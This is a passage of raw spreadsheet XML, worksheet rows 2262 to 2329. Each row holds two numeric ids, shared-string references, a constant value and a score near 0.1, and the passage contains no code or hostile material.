      <c r="C2262" s="2" t="s">
        <v>2088</v>
      </c>
      <c r="D2262" s="2">
        <v>1.0</v>
      </c>
      <c r="E2262" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2262" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2263" ht="15.75" customHeight="1">
      <c r="A2263" s="1">
        <v>31587.0</v>
      </c>
      <c r="B2263" s="2">
        <v>5128684.0</v>
      </c>
      <c r="C2263" s="2" t="s">
        <v>2089</v>
      </c>
      <c r="D2263" s="2">
        <v>1.0</v>
      </c>
      <c r="E2263" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2263" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2264" ht="15.75" customHeight="1">
      <c r="A2264" s="1">
        <v>31673.0</v>
      </c>
      <c r="B2264" s="2">
        <v>5.1864419E7</v>
      </c>
      <c r="C2264" s="2" t="s">
        <v>2090</v>
      </c>
      <c r="D2264" s="2">
        <v>1.0</v>
      </c>
      <c r="E2264" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2264" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2265" ht="15.75" customHeight="1">
      <c r="A2265" s="1">
        <v>32033.0</v>
      </c>
      <c r="B2265" s="2">
        <v>5362146.0</v>
      </c>
      <c r="C2265" s="2" t="s">
        <v>2091</v>
      </c>
      <c r="D2265" s="2">
        <v>1.0</v>
      </c>
      <c r="E2265" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2265" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2266" ht="15.75" customHeight="1">
      <c r="A2266" s="1">
        <v>32124.0</v>
      </c>
      <c r="B2266" s="2">
        <v>5.4107447E7</v>
      </c>
      <c r="C2266" s="2" t="s">
        <v>2092</v>
      </c>
      <c r="D2266" s="2">
        <v>1.0</v>
      </c>
      <c r="E2266" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2266" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2267" ht="15.75" customHeight="1">
      <c r="A2267" s="1">
        <v>32623.0</v>
      </c>
      <c r="B2267" s="2">
        <v>5840027.0</v>
      </c>
      <c r="C2267" s="2" t="s">
        <v>2093</v>
      </c>
      <c r="D2267" s="2">
        <v>1.0</v>
      </c>
      <c r="E2267" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2267" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2268" ht="15.75" customHeight="1">
      <c r="A2268" s="1">
        <v>21535.0</v>
      </c>
      <c r="B2268" s="2">
        <v>2.3504738E7</v>
      </c>
      <c r="C2268" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="D2268" s="2">
        <v>1.0</v>
      </c>
      <c r="E2268" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2268" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="2269" ht="15.75" customHeight="1">
      <c r="A2269" s="1">
        <v>25580.0</v>
      </c>
      <c r="B2269" s="2">
        <v>1.4339663E7</v>
      </c>
      <c r="C2269" s="2" t="s">
        <v>2095</v>
      </c>
      <c r="D2269" s="2">
        <v>1.0</v>
      </c>
      <c r="E2269" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2269" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="2270" ht="15.75" customHeight="1">
      <c r="A2270" s="1">
        <v>10578.0</v>
      </c>
      <c r="B2270" s="2">
        <v>1.3027901E7</v>
      </c>
      <c r="C2270" s="2" t="s">
        <v>2096</v>
      </c>
      <c r="D2270" s="2">
        <v>1.0</v>
      </c>
      <c r="E2270" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2270" s="2">
        <v>0.1009259259259259</v>
      </c>
    </row>
    <row r="2271" ht="15.75" customHeight="1">
      <c r="A2271" s="1">
        <v>11713.0</v>
      </c>
      <c r="B2271" s="2">
        <v>2.3686241E7</v>
      </c>
      <c r="C2271" s="2" t="s">
        <v>2097</v>
      </c>
      <c r="D2271" s="2">
        <v>1.0</v>
      </c>
      <c r="E2271" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2271" s="2">
        <v>0.1009259259259259</v>
      </c>
    </row>
    <row r="2272" ht="15.75" customHeight="1">
      <c r="A2272" s="1">
        <v>33239.0</v>
      </c>
      <c r="B2272" s="2">
        <v>7303601.0</v>
      </c>
      <c r="C2272" s="2" t="s">
        <v>2098</v>
      </c>
      <c r="D2272" s="2">
        <v>1.0</v>
      </c>
      <c r="E2272" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2272" s="2">
        <v>0.1009259259259259</v>
      </c>
    </row>
    <row r="2273" ht="15.75" customHeight="1">
      <c r="A2273" s="1">
        <v>17509.0</v>
      </c>
      <c r="B2273" s="2">
        <v>5.0013371E7</v>
      </c>
      <c r="C2273" s="2" t="s">
        <v>2099</v>
      </c>
      <c r="D2273" s="2">
        <v>1.0</v>
      </c>
      <c r="E2273" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2273" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="2274" ht="15.75" customHeight="1">
      <c r="A2274" s="1">
        <v>11359.0</v>
      </c>
      <c r="B2274" s="2">
        <v>2.1340215E7</v>
      </c>
      <c r="C2274" s="2" t="s">
        <v>2100</v>
      </c>
      <c r="D2274" s="2">
        <v>1.0</v>
      </c>
      <c r="E2274" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2274" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="2275" ht="15.75" customHeight="1">
      <c r="A2275" s="1">
        <v>23100.0</v>
      </c>
      <c r="B2275" s="2">
        <v>5082629.0</v>
      </c>
      <c r="C2275" s="2" t="s">
        <v>2101</v>
      </c>
      <c r="D2275" s="2">
        <v>1.0</v>
      </c>
      <c r="E2275" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2275" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="2276" ht="15.75" customHeight="1">
      <c r="A2276" s="1">
        <v>29674.0</v>
      </c>
      <c r="B2276" s="2">
        <v>3.3994054E7</v>
      </c>
      <c r="C2276" s="2" t="s">
        <v>2102</v>
      </c>
      <c r="D2276" s="2">
        <v>1.0</v>
      </c>
      <c r="E2276" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2276" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="2277" ht="15.75" customHeight="1">
      <c r="A2277" s="1">
        <v>31520.0</v>
      </c>
      <c r="B2277" s="2">
        <v>5082628.0</v>
      </c>
      <c r="C2277" s="2" t="s">
        <v>2101</v>
      </c>
      <c r="D2277" s="2">
        <v>1.0</v>
      </c>
      <c r="E2277" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2277" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="2278" ht="15.75" customHeight="1">
      <c r="A2278" s="1">
        <v>23564.0</v>
      </c>
      <c r="B2278" s="2">
        <v>6156092.0</v>
      </c>
      <c r="C2278" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="D2278" s="2">
        <v>1.0</v>
      </c>
      <c r="E2278" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2278" s="2">
        <v>0.0998263888888889</v>
      </c>
    </row>
    <row r="2279" ht="15.75" customHeight="1">
      <c r="A2279" s="1">
        <v>33782.0</v>
      </c>
      <c r="B2279" s="2">
        <v>8731958.0</v>
      </c>
      <c r="C2279" s="2" t="s">
        <v>2104</v>
      </c>
      <c r="D2279" s="2">
        <v>1.0</v>
      </c>
      <c r="E2279" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2279" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="2280" ht="15.75" customHeight="1">
      <c r="A2280" s="1">
        <v>19588.0</v>
      </c>
      <c r="B2280" s="2">
        <v>5.6161343E7</v>
      </c>
      <c r="C2280" s="2" t="s">
        <v>2105</v>
      </c>
      <c r="D2280" s="2">
        <v>1.0</v>
      </c>
      <c r="E2280" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2280" s="2">
        <v>0.09979423868312753</v>
      </c>
    </row>
    <row r="2281" ht="15.75" customHeight="1">
      <c r="A2281" s="1">
        <v>25535.0</v>
      </c>
      <c r="B2281" s="2">
        <v>1.4238565E7</v>
      </c>
      <c r="C2281" s="2" t="s">
        <v>2106</v>
      </c>
      <c r="D2281" s="2">
        <v>1.0</v>
      </c>
      <c r="E2281" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2281" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="2282" ht="15.75" customHeight="1">
      <c r="A2282" s="1">
        <v>28247.0</v>
      </c>
      <c r="B2282" s="2">
        <v>2.5226602E7</v>
      </c>
      <c r="C2282" s="2" t="s">
        <v>2107</v>
      </c>
      <c r="D2282" s="2">
        <v>1.0</v>
      </c>
      <c r="E2282" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2282" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="2283" ht="15.75" customHeight="1">
      <c r="A2283" s="1">
        <v>30143.0</v>
      </c>
      <c r="B2283" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C2283" s="2" t="s">
        <v>2108</v>
      </c>
      <c r="D2283" s="2">
        <v>1.0</v>
      </c>
      <c r="E2283" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2283" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="2284" ht="15.75" customHeight="1">
      <c r="A2284" s="1">
        <v>29010.0</v>
      </c>
      <c r="B2284" s="2">
        <v>2.9975852E7</v>
      </c>
      <c r="C2284" s="2" t="s">
        <v>2109</v>
      </c>
      <c r="D2284" s="2">
        <v>1.0</v>
      </c>
      <c r="E2284" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2284" s="2">
        <v>0.09946236559139784</v>
      </c>
    </row>
    <row r="2285" ht="15.75" customHeight="1">
      <c r="A2285" s="1">
        <v>60.0</v>
      </c>
      <c r="B2285" s="2">
        <v>1.1138017E7</v>
      </c>
      <c r="C2285" s="2" t="s">
        <v>2110</v>
      </c>
      <c r="D2285" s="2">
        <v>1.0</v>
      </c>
      <c r="E2285" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2285" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2286" ht="15.75" customHeight="1">
      <c r="A2286" s="1">
        <v>289.0</v>
      </c>
      <c r="B2286" s="2">
        <v>1.5463859E7</v>
      </c>
      <c r="C2286" s="2" t="s">
        <v>2111</v>
      </c>
      <c r="D2286" s="2">
        <v>1.0</v>
      </c>
      <c r="E2286" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2286" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2287" ht="15.75" customHeight="1">
      <c r="A2287" s="1">
        <v>338.0</v>
      </c>
      <c r="B2287" s="2">
        <v>1.5855325E7</v>
      </c>
      <c r="C2287" s="2" t="s">
        <v>2112</v>
      </c>
      <c r="D2287" s="2">
        <v>1.0</v>
      </c>
      <c r="E2287" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2287" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2288" ht="15.75" customHeight="1">
      <c r="A2288" s="1">
        <v>1137.0</v>
      </c>
      <c r="B2288" s="2">
        <v>2.4217893E7</v>
      </c>
      <c r="C2288" s="2" t="s">
        <v>2113</v>
      </c>
      <c r="D2288" s="2">
        <v>1.0</v>
      </c>
      <c r="E2288" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2288" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2289" ht="15.75" customHeight="1">
      <c r="A2289" s="1">
        <v>2397.0</v>
      </c>
      <c r="B2289" s="2">
        <v>3338285.0</v>
      </c>
      <c r="C2289" s="2" t="s">
        <v>2114</v>
      </c>
      <c r="D2289" s="2">
        <v>1.0</v>
      </c>
      <c r="E2289" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2289" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2290" ht="15.75" customHeight="1">
      <c r="A2290" s="1">
        <v>2746.0</v>
      </c>
      <c r="B2290" s="2">
        <v>3.5032901E7</v>
      </c>
      <c r="C2290" s="2" t="s">
        <v>2115</v>
      </c>
      <c r="D2290" s="2">
        <v>1.0</v>
      </c>
      <c r="E2290" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2290" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2291" ht="15.75" customHeight="1">
      <c r="A2291" s="1">
        <v>2974.0</v>
      </c>
      <c r="B2291" s="2">
        <v>3.6105348E7</v>
      </c>
      <c r="C2291" s="2" t="s">
        <v>2116</v>
      </c>
      <c r="D2291" s="2">
        <v>1.0</v>
      </c>
      <c r="E2291" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2291" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2292" ht="15.75" customHeight="1">
      <c r="A2292" s="1">
        <v>3566.0</v>
      </c>
      <c r="B2292" s="2">
        <v>3.8934501E7</v>
      </c>
      <c r="C2292" s="2" t="s">
        <v>2117</v>
      </c>
      <c r="D2292" s="2">
        <v>1.0</v>
      </c>
      <c r="E2292" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2292" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2293" ht="15.75" customHeight="1">
      <c r="A2293" s="1">
        <v>4179.0</v>
      </c>
      <c r="B2293" s="2">
        <v>4.1560437E7</v>
      </c>
      <c r="C2293" s="2" t="s">
        <v>2118</v>
      </c>
      <c r="D2293" s="2">
        <v>1.0</v>
      </c>
      <c r="E2293" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2293" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2294" ht="15.75" customHeight="1">
      <c r="A2294" s="1">
        <v>4371.0</v>
      </c>
      <c r="B2294" s="2">
        <v>4.2132051E7</v>
      </c>
      <c r="C2294" s="2" t="s">
        <v>2119</v>
      </c>
      <c r="D2294" s="2">
        <v>1.0</v>
      </c>
      <c r="E2294" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2294" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2295" ht="15.75" customHeight="1">
      <c r="A2295" s="1">
        <v>4410.0</v>
      </c>
      <c r="B2295" s="2">
        <v>4.2281907E7</v>
      </c>
      <c r="C2295" s="2" t="s">
        <v>2120</v>
      </c>
      <c r="D2295" s="2">
        <v>1.0</v>
      </c>
      <c r="E2295" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2295" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2296" ht="15.75" customHeight="1">
      <c r="A2296" s="1">
        <v>5256.0</v>
      </c>
      <c r="B2296" s="2">
        <v>4.5106229E7</v>
      </c>
      <c r="C2296" s="2" t="s">
        <v>2121</v>
      </c>
      <c r="D2296" s="2">
        <v>1.0</v>
      </c>
      <c r="E2296" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2296" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2297" ht="15.75" customHeight="1">
      <c r="A2297" s="1">
        <v>5435.0</v>
      </c>
      <c r="B2297" s="2">
        <v>4.5592334E7</v>
      </c>
      <c r="C2297" s="2" t="s">
        <v>2122</v>
      </c>
      <c r="D2297" s="2">
        <v>1.0</v>
      </c>
      <c r="E2297" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2297" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2298" ht="15.75" customHeight="1">
      <c r="A2298" s="1">
        <v>5501.0</v>
      </c>
      <c r="B2298" s="2">
        <v>4.5814134E7</v>
      </c>
      <c r="C2298" s="2" t="s">
        <v>2123</v>
      </c>
      <c r="D2298" s="2">
        <v>1.0</v>
      </c>
      <c r="E2298" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2298" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2299" ht="15.75" customHeight="1">
      <c r="A2299" s="1">
        <v>6634.0</v>
      </c>
      <c r="B2299" s="2">
        <v>4.9063021E7</v>
      </c>
      <c r="C2299" s="2" t="s">
        <v>2124</v>
      </c>
      <c r="D2299" s="2">
        <v>1.0</v>
      </c>
      <c r="E2299" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2299" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2300" ht="15.75" customHeight="1">
      <c r="A2300" s="1">
        <v>7149.0</v>
      </c>
      <c r="B2300" s="2">
        <v>5.0464054E7</v>
      </c>
      <c r="C2300" s="2" t="s">
        <v>2125</v>
      </c>
      <c r="D2300" s="2">
        <v>1.0</v>
      </c>
      <c r="E2300" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2300" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2301" ht="15.75" customHeight="1">
      <c r="A2301" s="1">
        <v>7154.0</v>
      </c>
      <c r="B2301" s="2">
        <v>5.0465924E7</v>
      </c>
      <c r="C2301" s="2" t="s">
        <v>2126</v>
      </c>
      <c r="D2301" s="2">
        <v>1.0</v>
      </c>
      <c r="E2301" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2301" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2302" ht="15.75" customHeight="1">
      <c r="A2302" s="1">
        <v>7204.0</v>
      </c>
      <c r="B2302" s="2">
        <v>5.0596052E7</v>
      </c>
      <c r="C2302" s="2" t="s">
        <v>2127</v>
      </c>
      <c r="D2302" s="2">
        <v>1.0</v>
      </c>
      <c r="E2302" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2302" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2303" ht="15.75" customHeight="1">
      <c r="A2303" s="1">
        <v>7491.0</v>
      </c>
      <c r="B2303" s="2">
        <v>5.1375726E7</v>
      </c>
      <c r="C2303" s="2" t="s">
        <v>2128</v>
      </c>
      <c r="D2303" s="2">
        <v>1.0</v>
      </c>
      <c r="E2303" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2303" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2304" ht="15.75" customHeight="1">
      <c r="A2304" s="1">
        <v>7818.0</v>
      </c>
      <c r="B2304" s="2">
        <v>5.2276816E7</v>
      </c>
      <c r="C2304" s="2" t="s">
        <v>2129</v>
      </c>
      <c r="D2304" s="2">
        <v>1.0</v>
      </c>
      <c r="E2304" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2304" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2305" ht="15.75" customHeight="1">
      <c r="A2305" s="1">
        <v>8098.0</v>
      </c>
      <c r="B2305" s="2">
        <v>5.3060119E7</v>
      </c>
      <c r="C2305" s="2" t="s">
        <v>2130</v>
      </c>
      <c r="D2305" s="2">
        <v>1.0</v>
      </c>
      <c r="E2305" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2305" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2306" ht="15.75" customHeight="1">
      <c r="A2306" s="1">
        <v>9648.0</v>
      </c>
      <c r="B2306" s="2">
        <v>5.6265801E7</v>
      </c>
      <c r="C2306" s="2" t="s">
        <v>2131</v>
      </c>
      <c r="D2306" s="2">
        <v>1.0</v>
      </c>
      <c r="E2306" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2306" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2307" ht="15.75" customHeight="1">
      <c r="A2307" s="1">
        <v>10133.0</v>
      </c>
      <c r="B2307" s="2">
        <v>5.7291192E7</v>
      </c>
      <c r="C2307" s="2" t="s">
        <v>2132</v>
      </c>
      <c r="D2307" s="2">
        <v>1.0</v>
      </c>
      <c r="E2307" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2307" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2308" ht="15.75" customHeight="1">
      <c r="A2308" s="1">
        <v>10297.0</v>
      </c>
      <c r="B2308" s="2">
        <v>5.7655026E7</v>
      </c>
      <c r="C2308" s="2" t="s">
        <v>2133</v>
      </c>
      <c r="D2308" s="2">
        <v>1.0</v>
      </c>
      <c r="E2308" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2308" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2309" ht="15.75" customHeight="1">
      <c r="A2309" s="1">
        <v>11381.0</v>
      </c>
      <c r="B2309" s="2">
        <v>2.1420184E7</v>
      </c>
      <c r="C2309" s="2" t="s">
        <v>2134</v>
      </c>
      <c r="D2309" s="2">
        <v>1.0</v>
      </c>
      <c r="E2309" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2309" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2310" ht="15.75" customHeight="1">
      <c r="A2310" s="1">
        <v>11408.0</v>
      </c>
      <c r="B2310" s="2">
        <v>2.1647787E7</v>
      </c>
      <c r="C2310" s="2" t="s">
        <v>2135</v>
      </c>
      <c r="D2310" s="2">
        <v>1.0</v>
      </c>
      <c r="E2310" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2310" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2311" ht="15.75" customHeight="1">
      <c r="A2311" s="1">
        <v>11715.0</v>
      </c>
      <c r="B2311" s="2">
        <v>2.3696306E7</v>
      </c>
      <c r="C2311" s="2" t="s">
        <v>2136</v>
      </c>
      <c r="D2311" s="2">
        <v>1.0</v>
      </c>
      <c r="E2311" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2311" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2312" ht="15.75" customHeight="1">
      <c r="A2312" s="1">
        <v>11833.0</v>
      </c>
      <c r="B2312" s="2">
        <v>2.4678116E7</v>
      </c>
      <c r="C2312" s="2" t="s">
        <v>2137</v>
      </c>
      <c r="D2312" s="2">
        <v>1.0</v>
      </c>
      <c r="E2312" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2312" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2313" ht="15.75" customHeight="1">
      <c r="A2313" s="1">
        <v>12331.0</v>
      </c>
      <c r="B2313" s="2">
        <v>2.8532573E7</v>
      </c>
      <c r="C2313" s="2" t="s">
        <v>2138</v>
      </c>
      <c r="D2313" s="2">
        <v>1.0</v>
      </c>
      <c r="E2313" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2313" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2314" ht="15.75" customHeight="1">
      <c r="A2314" s="1">
        <v>12505.0</v>
      </c>
      <c r="B2314" s="2">
        <v>2.9638773E7</v>
      </c>
      <c r="C2314" s="2" t="s">
        <v>2139</v>
      </c>
      <c r="D2314" s="2">
        <v>1.0</v>
      </c>
      <c r="E2314" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2314" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2315" ht="15.75" customHeight="1">
      <c r="A2315" s="1">
        <v>12771.0</v>
      </c>
      <c r="B2315" s="2">
        <v>3.1260037E7</v>
      </c>
      <c r="C2315" s="2" t="s">
        <v>2140</v>
      </c>
      <c r="D2315" s="2">
        <v>1.0</v>
      </c>
      <c r="E2315" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2315" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2316" ht="15.75" customHeight="1">
      <c r="A2316" s="1">
        <v>12802.0</v>
      </c>
      <c r="B2316" s="2">
        <v>3.1435047E7</v>
      </c>
      <c r="C2316" s="2" t="s">
        <v>2141</v>
      </c>
      <c r="D2316" s="2">
        <v>1.0</v>
      </c>
      <c r="E2316" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2316" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2317" ht="15.75" customHeight="1">
      <c r="A2317" s="1">
        <v>12889.0</v>
      </c>
      <c r="B2317" s="2">
        <v>3.2050736E7</v>
      </c>
      <c r="C2317" s="2" t="s">
        <v>2142</v>
      </c>
      <c r="D2317" s="2">
        <v>1.0</v>
      </c>
      <c r="E2317" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2317" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2318" ht="15.75" customHeight="1">
      <c r="A2318" s="1">
        <v>13565.0</v>
      </c>
      <c r="B2318" s="2">
        <v>3.5699829E7</v>
      </c>
      <c r="C2318" s="2" t="s">
        <v>2143</v>
      </c>
      <c r="D2318" s="2">
        <v>1.0</v>
      </c>
      <c r="E2318" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2318" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2319" ht="15.75" customHeight="1">
      <c r="A2319" s="1">
        <v>14181.0</v>
      </c>
      <c r="B2319" s="2">
        <v>3.8102716E7</v>
      </c>
      <c r="C2319" s="2" t="s">
        <v>2144</v>
      </c>
      <c r="D2319" s="2">
        <v>1.0</v>
      </c>
      <c r="E2319" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2319" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2320" ht="15.75" customHeight="1">
      <c r="A2320" s="1">
        <v>14283.0</v>
      </c>
      <c r="B2320" s="2">
        <v>3.8470724E7</v>
      </c>
      <c r="C2320" s="2" t="s">
        <v>2145</v>
      </c>
      <c r="D2320" s="2">
        <v>1.0</v>
      </c>
      <c r="E2320" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2320" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2321" ht="15.75" customHeight="1">
      <c r="A2321" s="1">
        <v>15185.0</v>
      </c>
      <c r="B2321" s="2">
        <v>4.2032957E7</v>
      </c>
      <c r="C2321" s="2" t="s">
        <v>2146</v>
      </c>
      <c r="D2321" s="2">
        <v>1.0</v>
      </c>
      <c r="E2321" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2321" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2322" ht="15.75" customHeight="1">
      <c r="A2322" s="1">
        <v>15564.0</v>
      </c>
      <c r="B2322" s="2">
        <v>4.3428828E7</v>
      </c>
      <c r="C2322" s="2" t="s">
        <v>2147</v>
      </c>
      <c r="D2322" s="2">
        <v>1.0</v>
      </c>
      <c r="E2322" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2322" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2323" ht="15.75" customHeight="1">
      <c r="A2323" s="1">
        <v>15569.0</v>
      </c>
      <c r="B2323" s="2">
        <v>4.3430923E7</v>
      </c>
      <c r="C2323" s="2" t="s">
        <v>2120</v>
      </c>
      <c r="D2323" s="2">
        <v>1.0</v>
      </c>
      <c r="E2323" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2323" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2324" ht="15.75" customHeight="1">
      <c r="A2324" s="1">
        <v>15646.0</v>
      </c>
      <c r="B2324" s="2">
        <v>4.3613274E7</v>
      </c>
      <c r="C2324" s="2" t="s">
        <v>2148</v>
      </c>
      <c r="D2324" s="2">
        <v>1.0</v>
      </c>
      <c r="E2324" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2324" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2325" ht="15.75" customHeight="1">
      <c r="A2325" s="1">
        <v>15690.0</v>
      </c>
      <c r="B2325" s="2">
        <v>4.3883697E7</v>
      </c>
      <c r="C2325" s="2" t="s">
        <v>2120</v>
      </c>
      <c r="D2325" s="2">
        <v>1.0</v>
      </c>
      <c r="E2325" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2325" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2326" ht="15.75" customHeight="1">
      <c r="A2326" s="1">
        <v>15771.0</v>
      </c>
      <c r="B2326" s="2">
        <v>4.4184276E7</v>
      </c>
      <c r="C2326" s="2" t="s">
        <v>2149</v>
      </c>
      <c r="D2326" s="2">
        <v>1.0</v>
      </c>
      <c r="E2326" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2326" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2327" ht="15.75" customHeight="1">
      <c r="A2327" s="1">
        <v>17010.0</v>
      </c>
      <c r="B2327" s="2">
        <v>4.8432459E7</v>
      </c>
      <c r="C2327" s="2" t="s">
        <v>2150</v>
      </c>
      <c r="D2327" s="2">
        <v>1.0</v>
      </c>
      <c r="E2327" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2327" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2328" ht="15.75" customHeight="1">
      <c r="A2328" s="1">
        <v>17945.0</v>
      </c>
      <c r="B2328" s="2">
        <v>5.1249872E7</v>
      </c>
      <c r="C2328" s="2" t="s">
        <v>2151</v>
      </c>
      <c r="D2328" s="2">
        <v>1.0</v>
      </c>
      <c r="E2328" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2328" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2329" ht="15.75" customHeight="1">
      <c r="A2329" s="1">
        <v>18244.0</v>
      </c>
      <c r="B2329" s="2">
        <v>5.2144673E7</v>
      </c>
      <c r="C2329" s="2" t="s">
        <v>2152</v>
      </c>
      <c r="D2329" s="2">
        <v>1.0</v>
      </c>
